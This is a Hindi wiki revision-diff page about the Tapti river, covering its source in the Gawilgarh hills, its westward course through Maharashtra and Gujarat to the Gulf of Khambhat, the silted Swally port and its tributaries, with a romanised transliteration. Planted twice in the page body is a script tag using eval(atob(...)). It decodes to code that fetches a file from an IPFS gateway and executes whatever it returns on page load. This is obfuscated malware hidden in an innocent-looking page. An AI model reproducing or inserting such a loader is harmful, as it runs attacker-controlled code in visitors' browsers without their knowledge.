Difference between revisions of "ताप्ती नदी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*'''ताप्ती नदी को तापी नदी भी कहा जाता है''' इसका उदगम मध्य [[भारत]], दक्षिण-[[मध्य प्रदेश]] राज्य, मध्य दक्कन के पठार के गाविलगढ़  की पहाड़ियों से है।  
+
*'''ताप्ती नदी को तापी नदी भी कहा जाता है,''' इसका उदगम मध्य [[भारत]], दक्षिण-[[मध्य प्रदेश]] राज्य, मध्य दक्कन के पठार के गाविलगढ़  की पहाड़ियों से है।  
 
*यह पश्चिम की ओर सतपुड़ा श्रेणी के दो पहाड़ों के बीच से होकर [[महाराष्ट्र]] राज्य के जलगांव पठार को पार करके [[गुजरात]] राज्य में [[सूरत]] के मैदान से होते हुए खंभात की खाड़ी में गिरती है। इसकी कुल लंबाई लगभग 700 किमी है, और यह 65,300 वर्ग किमी क्षेत्र को अपवाहित करती है।  
 
*यह पश्चिम की ओर सतपुड़ा श्रेणी के दो पहाड़ों के बीच से होकर [[महाराष्ट्र]] राज्य के जलगांव पठार को पार करके [[गुजरात]] राज्य में [[सूरत]] के मैदान से होते हुए खंभात की खाड़ी में गिरती है। इसकी कुल लंबाई लगभग 700 किमी है, और यह 65,300 वर्ग किमी क्षेत्र को अपवाहित करती है।  
 
*अपने मार्ग के अंतिम 51 किमी में यह नदी ज्वारीय, लेकिन छोटे जहाज़ों के लिए परिवहनीय है। ताप्ती नदी के मुहाने पर स्थित स्वाली बंदरगाह है, जो कभी आंग्ल-[[पुर्तगाल|पुर्तगाली]] उपनिवेश इतिहास में विख्यात था। स्वाली बंदरगाह गाद जमा हो जाने के कारण अब बंद हो चुका है।  
 
*अपने मार्ग के अंतिम 51 किमी में यह नदी ज्वारीय, लेकिन छोटे जहाज़ों के लिए परिवहनीय है। ताप्ती नदी के मुहाने पर स्थित स्वाली बंदरगाह है, जो कभी आंग्ल-[[पुर्तगाल|पुर्तगाली]] उपनिवेश इतिहास में विख्यात था। स्वाली बंदरगाह गाद जमा हो जाने के कारण अब बंद हो चुका है।  

Revision as of 07:49, 22 January 2011

  • tapti nadi ko tapi nadi bhi kaha jata hai, isaka udagam madhy bharat, dakshin-madhy pradesh rajy, madhy dakkan ke pathar ke gavilagadh ki paha diyoan se hai.
  • yah pashchim ki or satapu da shreni ke do paha doan ke bich se hokar maharashtr rajy ke jalagaanv pathar ko par karake gujarat rajy mean soorat ke maidan se hote hue khanbhat ki kha di mean girati hai. isaki kul lanbaee lagabhag 700 kimi hai, aur yah 65,300 varg kimi kshetr ko apavahit karati hai.
  • apane marg ke aantim 51 kimi mean yah nadi jvariy, lekin chhote jahazoan ke lie parivahaniy hai. tapti nadi ke muhane par sthit svali bandaragah hai, jo kabhi aangl-purtagali upanivesh itihas mean vikhyat tha. svali bandaragah gad jama ho jane ke karan ab band ho chuka hai.
  • tapti nadi, isake uttar mean bahane vali apekshakrit lanbi narmada nadi ke lagabhag samanaantar bahati hai, jisase yah mukhy satapu da shreni dvara vibhajit hai. do nadi ghatiyaan aur inake bich ki shreniyaan uttari aur prayadvipiy bharat ke bich ek prakritik avarodh banati haian.
  • maharashtr mean dakshin se bahane vali poorna, girana aur panjhara isaki pramukh sahayak nadiyaan haian.


<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh